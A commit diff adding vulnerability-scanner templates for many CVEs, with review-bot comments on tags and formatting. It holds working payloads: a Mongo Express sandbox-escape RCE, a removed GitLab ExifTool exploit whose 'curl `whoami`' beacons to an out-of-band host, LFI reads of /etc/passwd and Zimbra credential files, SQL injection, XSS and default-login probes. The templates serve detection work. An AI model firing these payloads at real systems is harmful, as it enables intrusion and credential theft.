root 2022-01-25 19:10:17 +02:00
commit e7d42abe0b
34 changed files with 1069 additions and 56 deletions


@ -6,6 +6,7 @@ info:
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
@ -24,3 +25,5 @@ network:
- type: word
words:
- "SSH-1"
# Updated by Chris on 2022/01/21
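Review bot: The remediation line `Upgrade to SSH 2.4 or later.` names a release without saying which implementation it belongs to, while the finding itself is about a deprecated protocol version; the marker column is not visible on this rendered page, but if this is the added line it would be clearer as `remediation: Disable SSH protocol version 1 on the server and accept only SSHv2 connections.`. The context line `tags: network,ssh,openssh,cves,cves2001` uses `cves,cves2001`, whereas every other CVE template in this commit uses the `cve,cve<year>` form; aligning it to `cve,cve2001` would keep tag-based runs consistent.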


@ -0,0 +1,28 @@
id: CVE-2009-5020
info:
name: AWStats < 6.95 - Open redirect
author: pdteam
severity: medium
description: Open redirect vulnerability in awredir.pl in AWStats before 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020
tags: cve,cve2020,redirect,awstats
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2009-5020
cwe-id: CWE-601
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
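Review bot: The year tag in `tags: cve,cve2020,redirect,awstats` does not match the template's `id: CVE-2009-5020` and `cve-id: CVE-2009-5020`; it should read `tags: cve,cve2009,redirect,awstats`. The same mismatch appears in the next file of this commit, CVE-2012-4547, which is tagged `cve2020` instead of `cve2012`. The `reference:` value here is a bare scalar while most other new templates in this commit use a list; a one-item list `- https://nvd.nist.gov/vuln/detail/CVE-2009-5020` keeps the files uniform.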


@ -0,0 +1,34 @@
id: CVE-2012-4547
info:
name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
reference:
- https://www.exploit-db.com/exploits/36164
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
tags: cve,cve2020,xss,awstats
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -0,0 +1,36 @@
id: CVE-2013-7091
info:
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
author: rubina119
severity: critical
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
- https://www.exploit-db.com/exploits/30085
- https://www.exploit-db.com/exploits/30472
tags: cve,cve2013,zimbra,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "zimbra_server_hostname"
- "zimbra_ldap_userdn"
- "zimbra_ldap_password"
- "ldap_postfix_password"
- "ldap_amavis_password"
- "ldap_nginx_password"
- "mysql_root_password"
condition: or
- type: regex
regex:
- "root=.*:0:0"


@ -0,0 +1,51 @@
id: CVE-2020-24391
info:
name: Mongo Express Remote Code Execution
author: leovalcante
severity: critical
description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24391
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-24391
tags: cve,cve2020,mongo,express,rce,intrusive
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /checkValid HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
- |
GET /public/css/{{randstr}}.css HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"


@ -1,63 +1,128 @@
id: CVE-2021-22205
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference:
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
tags: cve,cve2021,gitlab,rce,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
- "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
- "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
- "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
condition: or
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
- '(?:application-)(\S{64})(?:\.css)'
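Review bot: The new extractor regex `(?:application-)(\S{64})(?:\.css)` accepts any 64 non-space characters, while every value in the matcher list is lowercase hex; `(?:application-)([a-f0-9]{64})(?:\.css)` keeps what is extracted consistent with what is compared. The hash list is a snapshot produced by the generator linked in the references, so a comment above the first hash recording when and from which generator revision it was produced would tell maintainers when it needs refreshing, e.g. `# application-<hash>.css digests for vulnerable versions; generated with cve-2021-22205-hash-generator on <DATE>, revision <REV>`. The description says the hash is matched "in the header", but the word matcher carries no `part:` and therefore runs against the response body; if the HTML `<head>` is meant, saying so avoids confusion with HTTP headers. The rendered page does not show which side `matchers-condition: and` belongs to; if it survived the rewrite it is redundant with a single matcher.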


@ -0,0 +1,43 @@
id: CVE-2021-24750
info:
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author: cckuakilong
severity: high
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"
- type: status
status:
- 200
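Review bot: The expected body value `266f89556d2b38ff067b580fb305c522` is only meaningful together with the `md5('CVE-2021-24750')` expression in the injected request, and nothing in the file records that relationship, so a maintainer who edits the marker string has no way to see that the matcher must change with it. An inline comment on the words entry, `- "266f89556d2b38ff067b580fb305c522"  # md5('CVE-2021-24750')`, documents the derivation.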


@ -0,0 +1,32 @@
id: CVE-2021-24838
info:
name: AnyComment <= 0.2.21 - Open Redirect
author: noobexploiter
severity: medium
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
tags: wordpress,wp-plugin,open-redirect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24838
cwe-id: CWE-601
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
- 302
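Review bot: `tags: wordpress,wp-plugin,open-redirect` omits the `cve,cve2021` tags that every other CVE template in this commit carries and that the `cve-id: CVE-2021-24838` classification implies, so tag-filtered runs selecting `cve` will skip this template; `tags: cve,cve2021,wordpress,wp-plugin,open-redirect`. The AWStats redirect template added in this commit tags the same class as `redirect`; one spelling should be used across both.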


@ -1,12 +1,17 @@
id: CVE-2021-29156
info:
name: LDAP Injection In Openam
name: LDAP Injection In OpenAM
author: melbadry9,xelkomy
severity: high
tags: cve,cve2021,openam,ldap,injection
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
reference:
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
https://hackerone.com/reports/1278050
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
https://portswigger.net/research/hidden-oauth-attack-vectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -24,3 +29,5 @@ requests:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'
# Enhanced by cs on 2022/01/24
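Review bot: The four URLs under the new `reference:` key are printed without the `- ` item marker that every other reference list in this commit has; if the file really lacks them, YAML reads the block as one folded plain scalar (the URLs joined by spaces) rather than a list, and the hunk header `+1,17` is consistent with these being newly added lines. Prefix each URL with `- `. In the new description, `reset his password` and `they are asked` disagree in number; `their password` reads consistently.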


@ -0,0 +1,48 @@
id: CVE-2021-39350
info:
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
author: gy741
severity: medium
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
reference:
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-39350
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: CVE-2021-39433
info:
name: BIQS IT Biqs-drive v1.83 LFI
author: Veshraj
severity: high
description: A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
reference:
- https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
tags: lfi,biqsdrive,cve,cve2021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39433
requests:
- method: GET
path:
- "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,38 @@
id: CVE-2021-43810
info:
name: Admidio - Reflected XSS
author: gy741
severity: medium
description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-43810
cwe-id: CWE-79
tags: cve,cve2021,admidio,xss
requests:
- method: GET
path:
- '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'please click <a href="javascript://%0aalert(document.domain)" target="_self">'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200


@ -0,0 +1,35 @@
id: CVE-2022-0218
info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
author: hexcat
severity: high
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0218
tags: wordpress,wp-plugin,xss,cve,cve2022
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"background":'
- '"footer":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200


@ -0,0 +1,35 @@
id: CVE-2022-23178
info:
name: Crestron Device - Credentials Disclosure
author: gy741
severity: critical
description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
- https://nvd.nist.gov/vuln/detail/CVE-2022-23178
- https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
tags: cve,cve2022,crestron,disclosure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2022-23178
cwe-id: CWE-287
requests:
- method: GET
path:
- "{{BaseURL}}/aj.html?a=devi"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"uname":'
- '"upassword":'
condition: and


@ -0,0 +1,46 @@
id: gophish-default-login
info:
name: Gophish < v0.10.1 default credentials
author: arcc,dhiyaneshDK
severity: high
tags: gophish,default-login
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}}
attack: pitchfork
payloads:
user:
- admin
pass:
- gophish
cookie-reuse: true
extractors:
- type: regex
name: csrf_token
part: body
internal: true
group: 1
regex:
- 'name="csrf_token" value="(.+?)"'
matchers:
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'location: /login')"
- "contains(tolower(all_headers), 'location: /')"
- "contains(tolower(all_headers), 'gophish')"
- "status_code==302"
condition: and


@ -0,0 +1,38 @@
id: jmx-default-login
info:
name: JBoss JMX Console Weak Credential
author: paradessia
severity: high
tags: jboss,jmx,default-login
requests:
- raw:
- |
GET /jmx-console/ HTTP/1.1
Host: {{Hostname}}
